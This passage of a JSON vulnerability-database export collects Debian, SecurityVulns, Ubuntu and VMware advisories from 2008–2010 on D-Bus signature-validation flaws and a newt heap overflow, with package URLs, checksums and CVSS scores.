http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.2.1-5+lenny1_sparc.deb\r\n Size/MD5 checksum: 235150 7e6ab5023ad36c713a0eff40e6f60045\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkphji4ACgkQ62zWxYk/rQeUUQCgoAAlzCip8iT8Da1eYQ7VzKVn\r\nuBgAn0FFJcLPYuriEVVJkrlBhSjKwbE+\r\n=UcAL\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-07-20T00:00:00", "published": "2009-07-20T00:00:00", "id": "SECURITYVULNS:DOC:22190", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22190", "title": "[SECURITY] [DSA 1837-1] New dbus packages fix denial of service", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-1189"], "description": "Denial of Service via dbus_signature_validate.", "edition": 1, "modified": "2009-07-20T00:00:00", "published": "2009-07-20T00:00:00", "id": "SECURITYVULNS:VULN:10085", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10085", "title": "dbus DoS", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-09T01:36:52", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1189"], "description": "It was discovered that the D-Bus library did not correctly validate \nsignatures. 
If a local user sent a specially crafted D-Bus key, they could \nspoof a valid signature and bypass security policies.", "edition": 5, "modified": "2009-07-13T00:00:00", "published": "2009-07-13T00:00:00", "id": "USN-799-1", "href": "https://ubuntu.com/security/notices/USN-799-1", "title": "D-Bus vulnerability", "type": "ubuntu", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-07-08T23:42:06", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0595", "CVE-2008-3834"], "description": "Havoc Pennington discovered that the D-Bus daemon did not correctly \nvalidate certain security policies. If a local user sent a specially \ncrafted D-Bus request, they could bypass security policies that had a \n\"send_interface\" defined. (CVE-2008-0595)\n\nIt was discovered that the D-Bus library did not correctly validate \ncertain corrupted signatures. If a local user sent a specially crafted \nD-Bus request, they could crash applications linked against the D-Bus \nlibrary, leading to a denial of service. (CVE-2008-3834)", "edition": 5, "modified": "2008-10-14T00:00:00", "published": "2008-10-14T00:00:00", "id": "USN-653-1", "href": "https://ubuntu.com/security/notices/USN-653-1", "title": "D-Bus vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2019-11-06T16:05:46", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3613", "CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-3621", "CVE-2008-4316", "CVE-2009-3726", "CVE-2008-3916", "CVE-2009-3563", "CVE-2009-1387", "CVE-2009-0115", "CVE-2009-2904", "CVE-2009-1378", "CVE-2009-0590", "CVE-2008-4552", "CVE-2009-3547", "CVE-2009-2905", "CVE-2009-3620", "CVE-2009-2908", "CVE-2009-3720", "CVE-2009-1189", "CVE-2009-3228", "CVE-2009-3560", "CVE-2009-3286", "CVE-2009-3612", "CVE-2009-2695", "CVE-2009-4022", "CVE-2009-2849"], "description": "a. 
vMA and Service Console update for newt to 0.52.2-12.el5_4.1 \n \nNewt is a programming library for color text mode, widget based user interfaces. Newt can be used to add stacked windows, entry widgets, checkboxes, radio buttons, labels, plain text fields, scrollbars, etc., to text mode user interfaces. \nA heap-based buffer overflow flaw was found in the way newt processes content that is to be displayed in a text dialog box. A local attacker could issue a specially-crafted text dialog box display request (direct or via a custom application), leading to a denial of service (application crash) or, potentially, arbitrary code execution with the privileges of the user running the application using the newt library. \nThe Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-2905 to this issue. \nThe following table lists what action remediates the vulnerability (column 4) if a solution is available. \n\n", "edition": 4, "modified": "2010-10-06T00:00:00", "published": "2010-03-03T00:00:00", "id": "VMSA-2010-0004", "href": "https://www.vmware.com/security/advisories/VMSA-2010-0004.html", "title": "ESX Service Console and vMA third party updates", "type": "vmware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}